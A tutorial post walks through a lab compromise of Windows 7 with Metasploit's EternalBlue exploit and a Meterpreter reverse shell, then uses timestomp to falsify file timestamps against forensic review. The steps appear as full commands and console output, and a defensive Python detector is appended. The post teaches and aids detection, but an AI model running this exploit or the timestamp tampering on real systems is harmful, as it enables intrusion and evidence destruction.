Metasploit can be used in various ways to exploit Windows vulnerabilities. Metasploit, the most popular framework among pentesters and security researchers, is capable of attacking any Windows operating system platform and provides many exploits and modules to test and exploit Windows.
We will show the timestomp module in Metasploit, with which an attacker can change the file attributes of any file on a Windows machine. File attributes are the metadata associated with files in Windows; this metadata records the file's creation, modification and write date and time. According to ethical hacking researchers of the International Institute of Cyber Security, Metasploit has really helped the security community in its day-to-day work.
MACE Values
MACE (modified, accessed, created, entry modified) values are recognized as file attributes. They show the date and time of any file on Windows machines. File attributes are routinely examined by IT administrators during cyber forensics investigations. We will show how the timestomp module can be used to change the file attributes of any file on a Windows operating system.
- We will use two operating systems. On the attacker side we will use Kali Linux 2018.4 amd64.
- On the victim side we will use Windows 7 Build 7600 64 Bit with Windows Firewall and Defender disabled.
- Open a terminal in Kali Linux.
- Type msfconsole. For testing timestomp we will use an SMB (Server Message Block) exploit to attack the victim machine. SMB is used in different scenarios such as printer sharing, accessing Windows remote services and other services associated with SMB.
root@kali:/home/iicybersecurity/Downloads# msfconsole
=[ metasploit v4.17.17-dev ]
+ -- --=[ 1817 exploits - 1031 auxiliary - 315 post ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > options
- Type set RHOST 192.168.1.6 (the victim IP address)
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.6
RHOST => 192.168.1.6
msf exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.6 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
- Type run
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.4:4444 -> 192.168.1.6:58238) at 2020-01-17 23:50:10 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\iics\Desktop\iicybersecurity
cd C:\Users\iics\Desktop\iicybersecurity
C:\Users\iics\Desktop\iicybersecurity>
C:\Users\iics\Desktop\iicybersecurity>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9E30-BB33
Directory of C:\Users\iics\Desktop\iicybersecurity
01/18/2020 10:18 AM <DIR> .
01/18/2020 10:18 AM <DIR> ..
01/18/2020 10:19 AM 172 iicybersecurity.rar
01/18/2020 10:18 AM 21 iicybersecurity.txt
01/18/2020 10:18 AM 19 testfile.txt
3 File(s) 212 bytes
2 Dir(s) 40,536,866,816 bytes free
- While attacking with Metasploit, sometimes the shell doesn't respond properly. To solve this issue, type exit and press enter.
- Type y
C:\Windows\system32>exit
exit
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run the commands stored in a file
shell Spawn an interactive shell (*NIX Only)
download Download files (*NIX Only)
upload Upload files (*NIX Only)
background
Background session 7? [y/N] y
msf exploit(windows/smb/ms17_010_eternalblue) >
- Here, the attacker might need to set a Meterpreter payload. For that, type set payload windows/x64/meterpreter/reverse_tcp
- Type exploit; this will create a Meterpreter session to the victim machine.
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) >
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.6
[*] Meterpreter session 8 opened (192.168.1.4:4444 -> 192.168.1.6:55800) at 2020-01-18 00:33:38 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
meterpreter >
- Type timestomp help
meterpreter > timestomp help
Usage: timestomp <file(s)> OPTIONS
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
- Type ls and then type cd iicybersecurity
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2019-08-23 01:33:26 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:34 -0500 Program Files
40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:04 -0500 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2019-12-17 05:43:04 -0500 ProgramData
Clean.rar
40777/rwxrwxrwx 4096 dir 2020-01-16 06:37:21 -0500 System Volume Information
40555/r-xr-xr-x 4096 dir 2019-08-23 01:33:18 -0400 Users
40777/rwxrwxrwx 16384 dir 2020-01-18 00:38:27 -0500 Windows
40777/rwxrwxrwx 0 dir 2020-01-17 23:48:58 -0500 iicybersecurity
0000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
meterpreter >
meterpreter >
meterpreter > cd iicybersecurity
meterpreter >
meterpreter > ls
Listing: C:\iicybersecurity
===========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 172 fil 2020-01-17 23:49:00 -0500 iicybersecurity.rar
100666/rw-rw-rw- 21 fil 2020-01-17 23:48:31 -0500 iicybersecurity.txt
100666/rw-rw-rw- 19 fil 2020-01-17 23:48:44 -0500 testfile.txt
- Type timestomp iicybersecurity.txt -v. This command will show the details of the file together with its file attributes.
- -v displays the UTC MACE values of the file, which here are around 2020-01-17 23:48:XX.
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.txt
Modified : 2020-01-17 23:48:31 -0500
Accessed : 2020-01-17 23:47:38 -0500
Created : 2020-01-17 23:47:38 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
meterpreter >
- From here the attacker will change the file attributes to mislead IT administrators into believing that none of the files has been accessed, since the first step IT admins take is always to check the file attributes. In such cases, the Digital Forensics courses offered by the International Institute of Cyber Security help IT administrators understand the procedure for doing forensics after any such hacking activity.
Changing Accessed Time of File
- To change the accessed time of the file, type
meterpreter >
meterpreter > timestomp iicybersecurity.rar -a "02/11/2008 08:34:08"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
- Type timestomp iicybersecurity.rar -v. The output shows that the accessed time of the file has changed to 2008-02-11 08:34:08.
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2020-01-17 23:48:58 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
Changing Creation Time
- Type timestomp iicybersecurity.rar -c “02/11/2000 08:34:10”
- Type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -c "02/11/2000 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2000-02-11 08:34:10 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
- The output above shows that the creation time of the file has changed.
Changing the Entry Modified Time
- Type timestomp iicybersecurity.rar -e “02/05/2014 08:34:10”
- Then type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -e "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2000-02-11 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500
Changing All File Attributes
- Type timestomp iicybersecurity.rar -z “02/05/2014 08:34:10”
- Then type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -z "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2014-02-05 08:34:10 -0500
Accessed : 2014-02-05 08:34:10 -0500
Created : 2014-02-05 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500
meterpreter >
- The output above shows that all four file attributes have changed.
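As an added, defender-side example (not code from the original post or from Metasploit), the following Python script parses the timestomp -v output format shown above and flags the inconsistencies that the -a and -z changes leave behind: a timestamp that precedes the file's creation time, and all four MACE values being identical. The before/after values are the page's own, pasted in as constructed sample input.

```python
import re
from datetime import datetime

# Constructed sample input: the page's timestomp -v output for
# iicybersecurity.rar before any change, after "-a", and after "-z".
BEFORE = """Modified : 2020-01-17 23:48:31 -0500
Accessed : 2020-01-17 23:47:38 -0500
Created : 2020-01-17 23:47:38 -0500
Entry Modified: 2020-01-17 23:58:49 -0500"""

AFTER_A = """Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2020-01-17 23:48:58 -0500
Entry Modified: 2020-01-17 23:58:49 -0500"""

AFTER_Z = """Modified : 2014-02-05 08:34:10 -0500
Accessed : 2014-02-05 08:34:10 -0500
Created : 2014-02-05 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500"""

MACE_NAMES = ("Modified", "Accessed", "Created", "Entry Modified")
LINE = re.compile(r"^(Modified|Accessed|Created|Entry Modified)\s*:\s*(.+)$")

def parse_mace(text):
    """Parse timestomp -v style lines into {attribute name: aware datetime}."""
    mace = {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            mace[m.group(1)] = datetime.strptime(m.group(2).strip(),
                                                 "%Y-%m-%d %H:%M:%S %z")
    missing = set(MACE_NAMES) - mace.keys()
    if missing:
        raise ValueError(f"incomplete MACE record, missing {sorted(missing)}")
    return mace

def mace_findings(mace):
    """Return a list of consistency findings; an empty list means nothing odd."""
    findings = []
    created = mace["Created"]
    # A file cannot be modified, accessed or have its MFT entry changed
    # before it was created; "-a" with an old date trips this check.
    for name in ("Modified", "Accessed", "Entry Modified"):
        if mace[name] < created:
            findings.append(f"{name} precedes Created")
    # Four identical values to the second is the signature "-z" leaves.
    if len(set(mace.values())) == 1:
        findings.append("all four MACE values identical")
    return findings

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after -a", AFTER_A), ("after -z", AFTER_Z)):
        print(label, mace_findings(parse_mace(text)) or ["no findings"])
```

These checks use only the $STANDARD_INFORMATION values that timestomp exposes; a stronger check on a forensic image compares them against the $FILE_NAME timestamps in the MFT record, which timestomp's options shown above do not set.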
Cyber Security Researcher. Information security specialist, currently working as a risk infrastructure specialist and investigator. He is a cyber-security researcher with over 25 years of experience. He has served with the Intelligence Agency as a Senior Intelligence Officer. He has also worked with Google and Citrix in the development of cyber security solutions. He has aided the government and many federal agencies in thwarting many cyber crimes. He has been writing for us in his free time for the last 5 years.